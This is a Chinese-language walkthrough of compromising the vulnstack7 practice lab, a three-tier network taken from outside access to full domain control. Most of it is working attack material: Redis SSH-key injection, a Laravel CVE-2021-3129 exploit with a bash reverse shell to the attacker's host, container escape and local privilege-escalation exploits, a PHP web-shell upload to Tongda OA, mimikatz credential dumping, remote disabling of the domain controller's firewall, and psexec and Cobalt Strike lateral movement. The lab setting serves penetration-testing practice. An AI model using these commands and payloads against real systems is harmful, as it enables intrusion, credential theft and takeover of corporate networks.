从Redis未授权到拿下域控：手把手复现红日vulnstack7靶场的三层内网渗透实战

红日vulnstack7靶场三层内网渗透实战全解析1. 靶场环境与渗透测试概述红日vulnstack7靶场是一个精心设计的三层内网渗透实战环境模拟了企业级网络架构中常见的安全薄弱环节。这个靶场包含DMZ区、办公内网和核心业务区三个网络层次通过多个漏洞点的串联完整再现了从外网突破到最终控制域控服务器的全流程。靶场拓扑结构如下DMZ区域Ubuntu服务器Web 1运行着Redis、Nginx等服务配置了双网卡连接外网和内网第二层网络包含UbuntuWeb 2和Windows 7PC 1主机均配置双网卡第三层网络域控服务器Windows Server 2012和另一台Windows 7PC 2组成核心业务区渗透测试的关键技术节点包括Redis未授权访问漏洞利用Laravel远程代码执行CVE-2021-3129Docker容器逃逸技术环境变量劫持提权OverlayFS本地提权CVE-2021-3493MSF路由转发与EarthWorm代理搭建通达OA漏洞利用文件上传文件包含横向移动与域控攻防技术2. 外网突破与初始立足点获取2.1 Redis未授权访问漏洞利用Redis未授权访问是本次渗透的起点。当Redis服务绑定在0.0.0.0且未设置认证时攻击者可以直接连接并操作Redis服务。以下是具体利用步骤确认漏洞存在redis-cli -h 192.168.1.6若无需密码即可连接则存在未授权访问漏洞。SSH公钥写入ssh-keygen -t rsa # 生成密钥对 (echo -e \n\n; cat ~/.ssh/id_rsa.pub; echo -e \n\n) key.txt cat key.txt | redis-cli -h 192.168.1.6 -x set xxx配置Redis保存路径redis-cli -h 192.168.1.6 config set dir /root/.ssh config set dbfilename authorized_keys saveSSH免密登录ssh -i ~/.ssh/id_rsa root192.168.1.62.2 Laravel RCE漏洞利用通过信息收集发现81端口运行着Laravel v8.29.0存在CVE-2021-3129远程代码执行漏洞使用公开EXP生成WebShellgit clone https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP python3 exp.py -u http://192.168.1.6:81 -c bash -c exec bash -i /dev/tcp/192.168.1.9/8888 1使用哥斯拉连接WebShell下载Godzilla v2.92注意高版本可能不兼容配置PHP类型的WebShell连接获取交互式Shell后反弹到本地NC监听端口3. 内网横向移动技术3.1 Docker逃逸与权限提升获取的Laravel Shell运行在Docker容器内需要进行容器逃逸环境变量劫持提权find / -perm -us -type f 2/dev/null # 查找SUID文件 echo /bin/bash /tmp/ps chmod 777 /tmp/ps export PATH/tmp:$PATH ./shell # 执行高权限程序触发提权特权模式容器逃逸mkdir /gz mount /dev/sda1 /gz # 挂载宿主机磁盘 echo ssh-rsa AAA... /gz/home/ubuntu/.ssh/authorized_keys3.2 OverlayFS本地提权Ubuntu 14.04存在CVE-2021-3493漏洞编译执行EXPgcc exploit.c -o exploit chmod x exploit ./exploit获取Root权限后上线MSFuse exploit/multi/script/web_delivery set target 7 set payload linux/x64/meterpreter/reverse_tcp set LHOST 192.168.1.9 set LPORT 1111 exploit4. 多层网络穿透技术4.1 EarthWorm代理搭建# 攻击机执行 ./ew_for_linux64 -s rcsocks -l 1080 -e 1234 # 目标机执行 nohup ./ew_for_linux64 -s rssocks -d 192.168.1.9 -e 1234配置proxychainsvim /etc/proxychains4.conf # 添加 socks5 127.0.0.1 10804.2 通达OA漏洞利用文件上传漏洞POST /ispirit/im/upload.php HTTP/1.1 Host: 192.168.52.30:8080 Content-Type: multipart/form-data; boundary----WebKitFormBoundarypyfBh1YB4pV8McGB ------WebKitFormBoundarypyfBh1YB4pV8McGB Content-Disposition: form-data; nameATTACHMENT; filenamejpg Content-Type: image/jpeg ?php system($_REQUEST[cmd]); ?文件包含执行命令POST /ispirit/interface/gateway.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded json{url:/general/../../attach/im/2206/1102423157.jpg}cmdwhoami5. 域环境渗透与最终控制5.1 横向移动与凭证窃取load kiwi kiwi_cmd privilege::debug kiwi_cmd sekurlsa::logonPasswords获取到的凭证域用户bunny/Bunny2021域管理员administrator/Whoami20215.2 域控服务器攻防关闭域控防火墙net use \\192.168.93.30\ipc$ Whoami2021 /user:Administrator sc \\192.168.93.30 create unablefirewall binpath netsh advfirewall set allprofiles state off sc \\192.168.93.30 start unablefirewall使用psexec获取域控Shelluse exploit/windows/smb/psexec set RHOSTS 192.168.93.30 set SMBUser administrator set SMBPass Whoami2021 set payload windows/meterpreter/bind_tcp exploit5.3 Cobalt Strike联动渗透创建Web Delivery投递Payloadattacks - Web Drive-by - Scripted Web Delivery通过SMB Beacon横向移动在已控主机上执行SMB Beacon连接命令使用jump命令横向移动到其他主机最终获取域控和所有内网主机的控制权